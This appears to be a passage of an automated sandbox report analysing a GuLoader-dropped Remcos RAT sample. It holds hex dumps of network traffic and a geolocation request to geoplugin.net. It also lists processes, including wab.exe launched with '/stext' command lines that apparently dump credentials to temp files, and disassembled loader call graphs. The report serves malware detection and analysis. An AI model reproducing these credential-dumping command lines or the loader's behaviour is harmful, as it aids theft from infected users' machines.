                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015872955 CEST18INData Raw: db 2a 49 a5 e9 17 80 12 3d 74 a2 bf b4 0c c9 96 45 0c b7 c8 89 20 1d c1 0d cf be b4 88 f5 55 59 0f 9b c0 a5 6c 2a 45 d6 e7 fb 07 b3 cf 9b d9 b4 b1 45 30 7b 8b 50 83 ea 87 e5 32 cf 39 46 8d d8 67 09 bb 7d 12 27 9e 2f a1 06 c7 ed c1 7b 05 b6 e8 a6
                                                                                                                                                                                                                  Data Ascii: *I=tE UYl*EE0{P29Fg}'/{g+Z9rdtjygz8dA`*QCB/$Gz{KXZz]hf3B)Y@U;I}t =ML4u-t_ZCDE%_^d8Rd
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015971899 CEST20INData Raw: 18 45 07 35 c0 8b 53 8e fc 60 07 4c ba ad 8b 71 c8 54 db 68 a6 60 9e 69 dd 76 88 7f 1a 67 4c 20 43 5c 98 35 6e 1e 93 c3 68 ea 67 34 b1 2a 0f 62 6d bf 6d 44 00 27 10 49 e8 82 ce 7b d4 58 c0 66 80 89 41 d1 a1 46 0c 1a b5 55 5a e2 2d 11 55 48 e7 78
                                                                                                                                                                                                                  Data Ascii: E5S`LqTh`ivgL C\5nhg4*bmmD'I{XfAFUZ-UHxn2*6Peg!2$l7CQhO%+< ,G}@PHV(!BsG_Iuq|m~i[7|l%6g-x^C6[68^='v
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.016153097 CEST21INData Raw: 7d 33 d8 58 67 ba 45 07 94 61 6b be ea d7 b1 6b 33 72 eb 0f 87 c6 32 76 1f 9f 88 ec 73 97 e7 40 6d a7 83 7f ff a4 17 34 ee 75 ab f8 8d ad 9d e3 52 17 91 ca 35 70 26 c1 77 51 c9 71 61 b3 02 0e e7 33 d4 5c a5 17 2c 61 41 0c 6d c8 56 ae 6d 9d 16 e5
                                                                                                                                                                                                                  Data Ascii: }3XgEakk3r2vs@m4uR5p&wQqa3\,aAmVmrks$FmkU5yP?Z1//q1Xv0E:u\zaM^ZZ<G9*P%eq&<5>{3f9a>o%ere]H#b@
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.318902016 CEST23INData Raw: 59 f7 86 e2 f2 48 a3 f4 ed 66 4f 57 ad ee e6 23 21 ef 33 9e 8c 28 4e 0b dd 59 46 9a 10 20 12 f2 72 7d b5 67 0d 84 03 d9 7b 79 9a 81 a2 d6 07 e2 c6 77 4c e3 01 55 b1 5b 98 12 63 4a 48 d4 55 28 7e 22 8c fc 54 b5 87 fb 52 b5 f4 63 44 3a ac ef fa fa
                                                                                                                                                                                                                  Data Ascii: YHfOW#!3(NYF r}g{ywLU[cJHU(~"TRcD:A9!w}?_nmG?-Rb+LUimI}1" aoXMz!\pMR281pqS3H#s'owm/8H)BF~9=!X Y


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  1192.168.11.2050057178.237.33.5080C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                  Oct 26, 2023 14:28:51.455518007 CEST529OUTGET /json.gp HTTP/1.1
                                                                                                                                                                                                                  Host: geoplugin.net
                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                  Oct 26, 2023 14:28:51.707737923 CEST536INHTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Thu, 26 Oct 2023 12:28:51 GMT
                                                                                                                                                                                                                  server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                  content-length: 958
                                                                                                                                                                                                                  content-type: application/json; charset=utf-8
                                                                                                                                                                                                                  cache-control: public, max-age=300
                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 30 32 2e 31 32 39 2e 31 35 33 2e 32 32 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4d 69 61 6d 69 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 46 4c 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 35 32 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 32 35 2e 37 36 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 38 30 2e 31 39 34 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d
                                                                                                                                                                                                                  Data Ascii: { "geoplugin_request":"102.129.153.223", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Miami", "geoplugin_region":"Florida", "geoplugin_regionCode":"FL", "geoplugin_regionName":"Florida", "geoplugin_areaCode":"", "geoplugin_dmaCode":"528", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"25.7689", "geoplugin_longitude":"-80.1946", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                  Start time:14:28:30
                                                                                                                                                                                                                  Start date:26/10/2023
                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                  File size:734'679 bytes
                                                                                                                                                                                                                  MD5 hash:8B1422D6B17DD727C69291AA1FF09481
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.49572727235.0000000003718000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                  Start time:14:28:36
                                                                                                                                                                                                                  Start date:26/10/2023
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  Imagebase:0xfa0000
                                                                                                                                                                                                                  File size:516'608 bytes
                                                                                                                                                                                                                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.54464219226.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                  Start time:14:28:51
                                                                                                                                                                                                                  Start date:26/10/2023
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oicgkvnekjmivsgoxokizzeblgyngayb
                                                                                                                                                                                                                  Imagebase:0xfa0000
                                                                                                                                                                                                                  File size:516'608 bytes
                                                                                                                                                                                                                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                  Start time:14:28:51
                                                                                                                                                                                                                  Start date:26/10/2023
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rdhzl
                                                                                                                                                                                                                  Imagebase:0xfa0000
                                                                                                                                                                                                                  File size:516'608 bytes
                                                                                                                                                                                                                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                  Start time:14:28:51
                                                                                                                                                                                                                  Start date:26/10/2023
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bxujegjz
                                                                                                                                                                                                                  Imagebase:0xfa0000
                                                                                                                                                                                                                  File size:516'608 bytes
                                                                                                                                                                                                                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                    Execution Coverage:21.4%
                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                    Signature Coverage:19.7%
                                                                                                                                                                                                                    Total number of Nodes:1548
                                                                                                                                                                                                                    Total number of Limit Nodes:40
                                                                                                                                                                                                                    execution_graph 3855 401941 3856 401943 3855->3856 3861 402c41 3856->3861 3862 402c4d 3861->3862 3906 4062dc 3862->3906 3865 401948 3867 4059cc 3865->3867 3948 405c97 3867->3948 3870 4059f4 DeleteFileW 3876 401951 3870->3876 3871 405a0b 3877 405b36 3871->3877 3962 4062ba lstrcpynW 3871->3962 3873 405a31 3874 405a44 3873->3874 3875 405a37 lstrcatW 3873->3875 3963 405bdb lstrlenW 3874->3963 3878 405a4a 3875->3878 3877->3876 3991 4065fd FindFirstFileW 3877->3991 3881 405a5a lstrcatW 3878->3881 3883 405a65 lstrlenW FindFirstFileW 3878->3883 3881->3883 3885 405b2b 3883->3885 3904 405a87 3883->3904 3884 405b54 3994 405b8f lstrlenW CharPrevW 3884->3994 3885->3877 3888 405b0e FindNextFileW 3892 405b24 FindClose 3888->3892 3888->3904 3889 405984 5 API calls 3891 405b66 3889->3891 3893 405b80 3891->3893 3894 405b6a 3891->3894 3892->3885 3896 405322 24 API calls 3893->3896 3894->3876 3898 405322 24 API calls 3894->3898 3896->3876 3897 4059cc 60 API calls 3897->3904 3899 405b77 3898->3899 3900 406080 36 API calls 3899->3900 3902 405b7e 3900->3902 3901 405322 24 API calls 3901->3888 3902->3876 3904->3888 3904->3897 3904->3901 3967 4062ba lstrcpynW 3904->3967 3968 405984 3904->3968 3976 405322 3904->3976 3987 406080 MoveFileExW 3904->3987 3920 4062e9 3906->3920 3907 406534 3908 402c6e 3907->3908 3939 4062ba lstrcpynW 3907->3939 3908->3865 3923 40654e 3908->3923 3910 406502 lstrlenW 3910->3920 3911 4062dc 10 API calls 3911->3910 3914 406417 GetSystemDirectoryW 3914->3920 3916 40642a GetWindowsDirectoryW 3916->3920 3917 40654e 5 API calls 3917->3920 3918 4062dc 10 API calls 3918->3920 3919 4064a5 lstrcatW 3919->3920 3920->3907 3920->3910 3920->3911 3920->3914 3920->3916 3920->3917 3920->3918 3920->3919 3921 40645e SHGetSpecialFolderLocation 3920->3921 3932 406188 3920->3932 3937 406201 wsprintfW 3920->3937 3938 4062ba lstrcpynW 3920->3938 3921->3920 3922 406476 SHGetPathFromIDListW CoTaskMemFree 3921->3922 3922->3920 3930 40655b 3923->3930 3924 4065d1 3925 4065d6 CharPrevW 3924->3925 3928 4065f7 3924->3928 3925->3924 3926 4065c4 CharNextW 3926->3924 3926->3930 3928->3865 3929 4065b0 CharNextW 3929->3930 3930->3924 3930->3926 3930->3929 3931 4065bf CharNextW 3930->3931 3944 405bbc 3930->3944 3931->3926 3940 406127 3932->3940 3935 4061ec 3935->3920 3936 4061bc RegQueryValueExW RegCloseKey 3936->3935 3937->3920 3938->3920 3939->3908 3941 406136 3940->3941 3942 40613a 3941->3942 3943 40613f RegOpenKeyExW 3941->3943 3942->3935 3942->3936 3943->3942 3945 405bc2 3944->3945 3946 405bd8 3945->3946 3947 405bc9 CharNextW 3945->3947 3946->3930 3947->3945 3997 4062ba lstrcpynW 3948->3997 3950 405ca8 3998 405c3a CharNextW CharNextW 3950->3998 3953 4059ec 3953->3870 3953->3871 3954 40654e 5 API calls 3957 405cbe 3954->3957 3955 405cef lstrlenW 3956 405cfa 3955->3956 3955->3957 3959 405b8f 3 API calls 3956->3959 3957->3953 3957->3955 3958 4065fd 2 API calls 3957->3958 3961 405bdb 2 API calls 3957->3961 3958->3957 3960 405cff GetFileAttributesW 3959->3960 3960->3953 3961->3955 3962->3873 3964 405be9 3963->3964 3965 405bfb 3964->3965 3966 405bef CharPrevW 3964->3966 3965->3878 3966->3964 3966->3965 3967->3904 4004 405d8b GetFileAttributesW 3968->4004 3971 4059b1 3971->3904 3972 4059a7 DeleteFileW 3974 4059ad 3972->3974 3973 40599f RemoveDirectoryW 3973->3974 3974->3971 3975 4059bd SetFileAttributesW 3974->3975 3975->3971 3977 40533d 3976->3977 3986 4053df 3976->3986 3978 405359 lstrlenW 3977->3978 3979 4062dc 17 API calls 3977->3979 3980 405382 3978->3980 3981 405367 lstrlenW 3978->3981 3979->3978 3982 405395 3980->3982 3983 405388 SetWindowTextW 3980->3983 3984 405379 lstrcatW 3981->3984 3981->3986 3985 40539b SendMessageW SendMessageW SendMessageW 3982->3985 3982->3986 3983->3982 3984->3980 3985->3986 3986->3904 3988 4060a1 3987->3988 3989 406094 3987->3989 3988->3904 4007 405f06 3989->4007 3992 406613 FindClose 3991->3992 3993 405b50 3991->3993 3992->3993 3993->3876 3993->3884 3995 405b5a 3994->3995 3996 405bab lstrcatW 3994->3996 3995->3889 3996->3995 3997->3950 3999 405c57 3998->3999 4001 405c69 3998->4001 4000 405c64 CharNextW 3999->4000 3999->4001 4003 405c8d 4000->4003 4002 405bbc CharNextW 4001->4002 4001->4003 4002->4001 4003->3953 4003->3954 4005 405990 4004->4005 4006 405d9d SetFileAttributesW 4004->4006 4005->3971 4005->3972 4005->3973 4006->4005 4008 405f36 4007->4008 4009 405f5c GetShortPathNameW 4007->4009 4034 405db0 GetFileAttributesW CreateFileW 4008->4034 4010 405f71 4009->4010 4011 40607b 4009->4011 4010->4011 4013 405f79 wsprintfA 4010->4013 4011->3988 4015 4062dc 17 API calls 4013->4015 4014 405f40 CloseHandle GetShortPathNameW 4014->4011 4016 405f54 4014->4016 4017 405fa1 4015->4017 4016->4009 4016->4011 4035 405db0 GetFileAttributesW CreateFileW 4017->4035 4019 405fae 4019->4011 4020 405fbd GetFileSize GlobalAlloc 4019->4020 4021 406074 CloseHandle 4020->4021 4022 405fdf 4020->4022 4021->4011 4036 405e33 ReadFile 4022->4036 4027 406012 4029 405d15 4 API calls 4027->4029 4028 405ffe lstrcpyA 4030 406020 4028->4030 4029->4030 4031 406057 SetFilePointer 4030->4031 4043 405e62 WriteFile 4031->4043 4034->4014 4035->4019 4037 405e51 4036->4037 4037->4021 4038 405d15 lstrlenA 4037->4038 4039 405d56 lstrlenA 4038->4039 4040 405d5e 4039->4040 4041 405d2f lstrcmpiA 4039->4041 4040->4027 4040->4028 4041->4040 4042 405d4d CharNextA 4041->4042 4042->4039 4044 405e80 GlobalFree 4043->4044 4044->4021 4045 4015c1 4046 402c41 17 API calls 4045->4046 4047 4015c8 4046->4047 4048 405c3a 4 API calls 4047->4048 4060 4015d1 4048->4060 4049 401631 4051 401663 4049->4051 4052 401636 4049->4052 4050 405bbc CharNextW 4050->4060 4054 401423 24 API calls 4051->4054 4072 401423 4052->4072 4062 40165b 4054->4062 4059 40164a SetCurrentDirectoryW 4059->4062 4060->4049 4060->4050 4061 401617 GetFileAttributesW 4060->4061 4064 40588b 4060->4064 4067 4057f1 CreateDirectoryW 4060->4067 4076 40586e CreateDirectoryW 4060->4076 4061->4060 4079 406694 GetModuleHandleA 4064->4079 4068 405842 GetLastError 4067->4068 4069 40583e 4067->4069 4068->4069 4070 405851 SetFileSecurityW 4068->4070 4069->4060 4070->4069 4071 405867 GetLastError 4070->4071 4071->4069 4073 405322 24 API calls 4072->4073 4074 401431 4073->4074 4075 4062ba lstrcpynW 4074->4075 4075->4059 4077 405882 GetLastError 4076->4077 4078 40587e 4076->4078 4077->4078 4078->4060 4080 4066b0 4079->4080 4081 4066ba GetProcAddress 4079->4081 4085 406624 GetSystemDirectoryW 4080->4085 4083 405892 4081->4083 4083->4060 4084 4066b6 4084->4081 4084->4083 4086 406646 wsprintfW LoadLibraryExW 4085->4086 4086->4084 4161 401e49 4162 402c1f 17 API calls 4161->4162 4163 401e4f 4162->4163 4164 402c1f 17 API calls 4163->4164 4165 401e5b 4164->4165 4166 401e72 EnableWindow 4165->4166 4167 401e67 ShowWindow 4165->4167 4168 402ac5 4166->4168 4167->4168 4169 40264a 4170 402c1f 17 API calls 4169->4170 4179 402659 4170->4179 4171 402796 4172 4026a3 ReadFile 4172->4171 4172->4179 4173 40273c 4173->4171 4173->4179 4183 405e91 SetFilePointer 4173->4183 4174 405e33 ReadFile 4174->4179 4176 4026e3 MultiByteToWideChar 4176->4179 4177 402798 4192 406201 wsprintfW 4177->4192 4179->4171 4179->4172 4179->4173 4179->4174 4179->4176 4179->4177 4180 402709 SetFilePointer MultiByteToWideChar 4179->4180 4181 4027a9 4179->4181 4180->4179 4181->4171 4182 4027ca SetFilePointer 4181->4182 4182->4171 4184 405ec5 4183->4184 4185 405ead 4183->4185 4184->4173 4186 405e33 ReadFile 4185->4186 4187 405eb9 4186->4187 4187->4184 4188 405ef6 SetFilePointer 4187->4188 4189 405ece SetFilePointer 4187->4189 4188->4184 4189->4188 4190 405ed9 4189->4190 4191 405e62 WriteFile 4190->4191 4191->4184 4192->4171 4968 4016cc 4969 402c41 17 API calls 4968->4969 4970 4016d2 GetFullPathNameW 4969->4970 4971 4016ec 4970->4971 4977 40170e 4970->4977 4973 4065fd 2 API calls 4971->4973 4971->4977 4972 401723 GetShortPathNameW 4974 402ac5 4972->4974 4975 4016fe 4973->4975 4975->4977 4978 4062ba lstrcpynW 4975->4978 4977->4972 4977->4974 4978->4977 4979 40234e 4980 402c41 17 API calls 4979->4980 4981 40235d 4980->4981 4982 402c41 17 API calls 4981->4982 4983 402366 4982->4983 4984 402c41 17 API calls 4983->4984 4985 402370 GetPrivateProfileStringW 4984->4985 4986 401b53 4987 402c41 17 API calls 4986->4987 4988 401b5a 4987->4988 4989 402c1f 17 API calls 4988->4989 4990 401b63 wsprintfW 4989->4990 4991 402ac5 4990->4991 4992 401956 4993 402c41 17 API calls 4992->4993 4994 40195d lstrlenW 4993->4994 4995 402592 4994->4995 4996 4014d7 4997 402c1f 17 API calls 4996->4997 4998 4014dd Sleep 4997->4998 5000 402ac5 4998->5000 4784 403d58 4785 403d70 4784->4785 4786 403eab 4784->4786 4785->4786 4787 403d7c 4785->4787 4788 403efc 4786->4788 4789 403ebc GetDlgItem GetDlgItem 4786->4789 4791 403d87 SetWindowPos 4787->4791 4792 403d9a 4787->4792 4790 403f56 4788->4790 4798 401389 2 API calls 4788->4798 4793 404231 18 API calls 4789->4793 4794 40427d SendMessageW 4790->4794 4799 403ea6 4790->4799 4791->4792 4795 403db7 4792->4795 4796 403d9f ShowWindow 4792->4796 4797 403ee6 SetClassLongW 4793->4797 4822 403f68 4794->4822 4800 403dd9 4795->4800 4801 403dbf DestroyWindow 4795->4801 4796->4795 4802 40140b 2 API calls 4797->4802 4806 403f2e 4798->4806 4804 403dde SetWindowLongW 4800->4804 4805 403def 4800->4805 4803 4041db 4801->4803 4802->4788 4803->4799 4815 4041eb ShowWindow 4803->4815 4804->4799 4807 403e98 4805->4807 4808 403dfb GetDlgItem 4805->4808 4806->4790 4809 403f32 SendMessageW 4806->4809 4865 404298 4807->4865 4812 403e2b 4808->4812 4813 403e0e SendMessageW IsWindowEnabled 4808->4813 4809->4799 4810 40140b 2 API calls 4810->4822 4811 4041bc DestroyWindow EndDialog 4811->4803 4817 403e38 4812->4817 4819 403e7f SendMessageW 4812->4819 4820 403e4b 4812->4820 4829 403e30 4812->4829 4813->4799 4813->4812 4815->4799 4816 4062dc 17 API calls 4816->4822 4817->4819 4817->4829 4819->4807 4823 403e53 4820->4823 4824 403e68 4820->4824 4821 403e66 4821->4807 4822->4799 4822->4810 4822->4811 4822->4816 4825 404231 18 API calls 4822->4825 4846 4040fc DestroyWindow 4822->4846 4856 404231 4822->4856 4827 40140b 2 API calls 4823->4827 4826 40140b 2 API calls 4824->4826 4825->4822 4828 403e6f 4826->4828 4827->4829 4828->4807 4828->4829 4862 40420a 4829->4862 4831 403fe3 GetDlgItem 4832 404000 ShowWindow KiUserCallbackDispatcher 4831->4832 4833 403ff8 4831->4833 4859 404253 EnableWindow 4832->4859 4833->4832 4835 40402a EnableWindow 4840 40403e 4835->4840 4836 404043 GetSystemMenu EnableMenuItem SendMessageW 4837 404073 SendMessageW 4836->4837 4836->4840 4837->4840 4839 403d39 18 API calls 4839->4840 4840->4836 4840->4839 4860 404266 SendMessageW 4840->4860 4861 4062ba lstrcpynW 4840->4861 4842 4040a2 lstrlenW 4843 4062dc 17 API calls 4842->4843 4844 4040b8 SetWindowTextW 4843->4844 4845 401389 2 API calls 4844->4845 4845->4822 4846->4803 4847 404116 CreateDialogParamW 4846->4847 4847->4803 4848 404149 4847->4848 4849 404231 18 API calls 4848->4849 4850 404154 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4849->4850 4851 401389 2 API calls 4850->4851 4852 40419a 4851->4852 4852->4799 4853 4041a2 ShowWindow 4852->4853 4854 40427d SendMessageW 4853->4854 4855 4041ba 4854->4855 4855->4803 4857 4062dc 17 API calls 4856->4857 4858 40423c SetDlgItemTextW 4857->4858 4858->4831 4859->4835 4860->4840 4861->4842 4863 404211 4862->4863 4864 404217 SendMessageW 4862->4864 4863->4864 4864->4821 4866 40435b 4865->4866 4867 4042b0 GetWindowLongW 4865->4867 4866->4799 4867->4866 4868 4042c5 4867->4868 4868->4866 4869 4042f2 GetSysColor 4868->4869 4870 4042f5 4868->4870 4869->4870 4871 404305 SetBkMode 4870->4871 4872 4042fb SetTextColor 4870->4872 4873 404323 4871->4873 4874 40431d GetSysColor 4871->4874 4872->4871 4875 404334 4873->4875 4876 40432a SetBkColor 4873->4876 4874->4873 4875->4866 4877 404347 DeleteObject 4875->4877 4878 40434e CreateBrushIndirect 4875->4878 4876->4875 4877->4878 4878->4866 5001 401f58 5002 402c41 17 API calls 5001->5002 5003 401f5f 5002->5003 5004 4065fd 2 API calls 5003->5004 5005 401f65 5004->5005 5007 401f76 5005->5007 5008 406201 wsprintfW 5005->5008 5008->5007 5009 402259 5010 402c41 17 API calls 5009->5010 5011 40225f 5010->5011 5012 402c41 17 API calls 5011->5012 5013 402268 5012->5013 5014 402c41 17 API calls 5013->5014 5015 402271 5014->5015 5016 4065fd 2 API calls 5015->5016 5017 40227a 5016->5017 5018 40228b lstrlenW lstrlenW 5017->5018 5019 40227e 5017->5019 5021 405322 24 API calls 5018->5021 5020 405322 24 API calls 5019->5020 5023 402286 5020->5023 5022 4022c9 SHFileOperationW 5021->5022 5022->5019 5022->5023 5024 4046db 5025 404711 5024->5025 5026 4046eb 5024->5026 5028 404298 8 API calls 5025->5028 5027 404231 18 API calls 5026->5027 5029 4046f8 SetDlgItemTextW 5027->5029 5030 40471d 5028->5030 5029->5025 5031 6f26103d 5034 6f26101b 5031->5034 5041 6f261516 5034->5041 5036 6f261020 5037 6f261027 GlobalAlloc 5036->5037 5038 6f261024 5036->5038 5037->5038 5039 6f26153d 3 API calls 5038->5039 5040 6f26103b 5039->5040 5043 6f26151c 5041->5043 5042 6f261522 5042->5036 5043->5042 5044 6f26152e GlobalFree 5043->5044 5044->5036 4890 40175c 4891 402c41 17 API calls 4890->4891 4892 401763 4891->4892 4893 405ddf 2 API calls 4892->4893 4894 40176a 